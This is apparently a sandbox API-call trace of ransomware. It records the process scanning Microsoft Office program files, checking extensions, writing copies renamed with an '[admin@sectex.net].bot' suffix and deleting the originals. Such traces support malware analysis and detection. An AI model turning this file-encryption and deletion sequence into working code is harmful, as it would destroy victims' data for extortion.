	[0152.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl")) returned 1
	[0152.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.588] lstrlenW (lpString=".doc") returned 4
	[0152.588] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString=".docx") returned 5
	[0152.588] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1
	[0152.588] lstrlenW (lpString=".pdf") returned 4
	[0152.588] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString=".xls") returned 4
	[0152.588] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0152.588] lstrlenW (lpString=".xlsx") returned 5
	[0152.588] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1
	[0152.588] lstrlenW (lpString=".ppt") returned 4
	[0152.588] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.588] lstrlenW (lpString=".zip") returned 4
	[0152.588] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0152.588] lstrlenW (lpString=".rar") returned 4
	[0152.588] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString=".bz2") returned 4
	[0152.588] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString=".7z") returned 3
	[0152.588] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0152.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.588] lstrlenW (lpString=".dbf") returned 4
	[0152.588] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0152.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString=".1cd") returned 4
	[0152.589] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString=".jpg") returned 4
	[0152.589] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString=".doc") returned 4
	[0152.589] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString=".docx") returned 5
	[0152.589] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1
	[0152.589] lstrlenW (lpString=".pdf") returned 4
	[0152.589] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString=".xls") returned 4
	[0152.589] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0152.589] lstrlenW (lpString=".xlsx") returned 5
	[0152.589] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1
	[0152.589] lstrlenW (lpString=".ppt") returned 4
	[0152.589] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString=".zip") returned 4
	[0152.589] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0152.589] lstrlenW (lpString=".rar") returned 4
	[0152.589] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString=".bz2") returned 4
	[0152.589] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0152.589] lstrlenW (lpString=".7z") returned 3
	[0152.589] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0152.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.589] lstrlenW (lpString=".dbf") returned 4
	[0152.590] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0152.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.590] lstrlenW (lpString=".1cd") returned 4
	[0152.590] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0152.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL") returned 60
	[0152.590] lstrlenW (lpString=".jpg") returned 4
	[0152.590] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0152.590] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0152.590] lstrlenW (lpString="VISINTL.DLL") returned 11
	[0152.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.101] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=758648) returned 1
	[0153.101] CloseHandle (hObject=0x3e8) returned 1
	[0153.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll")) returned 0x20
	[0153.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0153.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.101] lstrlenW (lpString=".doc") returned 4
	[0153.101] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0153.101] lstrlenW (lpString=".docx") returned 5
	[0153.101] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0153.101] lstrlenW (lpString=".pdf") returned 4
	[0153.101] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0153.101] lstrlenW (lpString=".xls") returned 4
	[0153.102] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString=".xlsx") returned 5
	[0153.102] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0153.102] lstrlenW (lpString=".ppt") returned 4
	[0153.102] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString=".zip") returned 4
	[0153.102] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString=".rar") returned 4
	[0153.102] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString=".bz2") returned 4
	[0153.102] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0153.102] lstrlenW (lpString=".7z") returned 3
	[0153.102] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString=".dbf") returned 4
	[0153.102] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString=".1cd") returned 4
	[0153.102] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString=".jpg") returned 4
	[0153.102] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.102] lstrlenW (lpString=".doc") returned 4
	[0153.102] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0153.102] lstrlenW (lpString=".docx") returned 5
	[0153.102] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0153.103] lstrlenW (lpString=".pdf") returned 4
	[0153.103] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0153.103] lstrlenW (lpString=".xls") returned 4
	[0153.103] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0153.103] lstrlenW (lpString=".xlsx") returned 5
	[0153.103] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0153.103] lstrlenW (lpString=".ppt") returned 4
	[0153.103] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0153.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.103] lstrlenW (lpString=".zip") returned 4
	[0153.103] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0153.103] lstrlenW (lpString=".rar") returned 4
	[0153.103] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0153.103] lstrlenW (lpString=".bz2") returned 4
	[0153.103] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0153.103] lstrlenW (lpString=".7z") returned 3
	[0153.103] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0153.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.103] lstrlenW (lpString=".dbf") returned 4
	[0153.103] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0153.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.103] lstrlenW (lpString=".1cd") returned 4
	[0153.103] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0153.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL") returned 59
	[0153.103] lstrlenW (lpString=".jpg") returned 4
	[0153.103] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0153.104] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0153.104] lstrlenW (lpString="VISIO_STD.HXS") returned 13
	[0153.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.104] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2520158) returned 1
	[0153.104] CloseHandle (hObject=0x3e8) returned 1
	[0153.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs")) returned 0x20
	[0153.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0153.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.105] lstrlenW (lpString=".doc") returned 4
	[0153.105] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.105] lstrlenW (lpString=".docx") returned 5
	[0153.105] lstrcmpiW (lpString1=".docx", lpString2="D.HXS") returned -1
	[0153.105] lstrlenW (lpString=".pdf") returned 4
	[0153.105] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.105] lstrlenW (lpString=".xls") returned 4
	[0153.105] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.105] lstrlenW (lpString=".xlsx") returned 5
	[0153.105] lstrcmpiW (lpString1=".xlsx", lpString2="D.HXS") returned -1
	[0153.105] lstrlenW (lpString=".ppt") returned 4
	[0153.105] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.105] lstrlenW (lpString=".zip") returned 4
	[0153.105] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.105] lstrlenW (lpString=".rar") returned 4
	[0153.105] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.105] lstrlenW (lpString=".bz2") returned 4
	[0153.105] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.105] lstrlenW (lpString=".7z") returned 3
	[0153.105] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString=".dbf") returned 4
	[0153.106] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString=".1cd") returned 4
	[0153.106] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString=".jpg") returned 4
	[0153.106] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString=".doc") returned 4
	[0153.106] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.106] lstrlenW (lpString=".docx") returned 5
	[0153.106] lstrcmpiW (lpString1=".docx", lpString2="D.HXS") returned -1
	[0153.106] lstrlenW (lpString=".pdf") returned 4
	[0153.106] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.106] lstrlenW (lpString=".xls") returned 4
	[0153.106] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.106] lstrlenW (lpString=".xlsx") returned 5
	[0153.106] lstrcmpiW (lpString1=".xlsx", lpString2="D.HXS") returned -1
	[0153.106] lstrlenW (lpString=".ppt") returned 4
	[0153.106] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.106] lstrlenW (lpString=".zip") returned 4
	[0153.106] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.107] lstrlenW (lpString=".rar") returned 4
	[0153.107] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.107] lstrlenW (lpString=".bz2") returned 4
	[0153.107] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.107] lstrlenW (lpString=".7z") returned 3
	[0153.107] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.107] lstrlenW (lpString=".dbf") returned 4
	[0153.107] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.107] lstrlenW (lpString=".1cd") returned 4
	[0153.107] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS") returned 61
	[0153.107] lstrlenW (lpString=".jpg") returned 4
	[0153.107] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.107] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0153.107] lstrlenW (lpString="VISIO_STD_COL.HXC") returned 17
	[0153.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.108] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=641) returned 1
	[0153.108] CloseHandle (hObject=0x3e8) returned 1
	[0153.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc")) returned 0x20
	[0153.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0153.108] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.108] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.109] GetLastError () returned 0x0
	[0153.109] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x281, lpOverlapped=0x0) returned 1
	[0153.490] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0153.491] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.491] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.491] SetEndOfFile (hFile=0x31c) returned 1
	[0153.491] CloseHandle (hObject=0x31c) returned 1
	[0153.491] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.491] SetEndOfFile (hFile=0x3e8) returned 1
	[0153.493] CloseHandle (hObject=0x3e8) returned 1
	[0153.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc")) returned 1
	[0153.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.494] lstrlenW (lpString=".doc") returned 4
	[0153.494] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.494] lstrlenW (lpString=".docx") returned 5
	[0153.494] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.494] lstrlenW (lpString=".pdf") returned 4
	[0153.494] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.494] lstrlenW (lpString=".xls") returned 4
	[0153.494] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.494] lstrlenW (lpString=".xlsx") returned 5
	[0153.494] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.494] lstrlenW (lpString=".ppt") returned 4
	[0153.495] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString=".zip") returned 4
	[0153.495] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.495] lstrlenW (lpString=".rar") returned 4
	[0153.495] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.495] lstrlenW (lpString=".bz2") returned 4
	[0153.495] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.495] lstrlenW (lpString=".7z") returned 3
	[0153.495] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString=".dbf") returned 4
	[0153.495] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString=".1cd") returned 4
	[0153.495] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString=".jpg") returned 4
	[0153.495] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.495] lstrlenW (lpString=".doc") returned 4
	[0153.495] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.495] lstrlenW (lpString=".docx") returned 5
	[0153.496] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.496] lstrlenW (lpString=".pdf") returned 4
	[0153.496] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.496] lstrlenW (lpString=".xls") returned 4
	[0153.496] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.496] lstrlenW (lpString=".xlsx") returned 5
	[0153.496] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.496] lstrlenW (lpString=".ppt") returned 4
	[0153.496] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.496] lstrlenW (lpString=".zip") returned 4
	[0153.496] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.496] lstrlenW (lpString=".rar") returned 4
	[0153.496] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.496] lstrlenW (lpString=".bz2") returned 4
	[0153.496] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.496] lstrlenW (lpString=".7z") returned 3
	[0153.496] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.496] lstrlenW (lpString=".dbf") returned 4
	[0153.496] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.496] lstrlenW (lpString=".1cd") returned 4
	[0153.496] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC") returned 65
	[0153.496] lstrlenW (lpString=".jpg") returned 4
	[0153.496] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.496] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0153.497] lstrlenW (lpString="WDERRLNK.VRD") returned 12
	[0153.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0153.532] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1826) returned 1
	[0153.532] CloseHandle (hObject=0x3d4) returned 1
	[0153.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd")) returned 0x20
	[0153.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDERRLNK.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wderrlnk.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
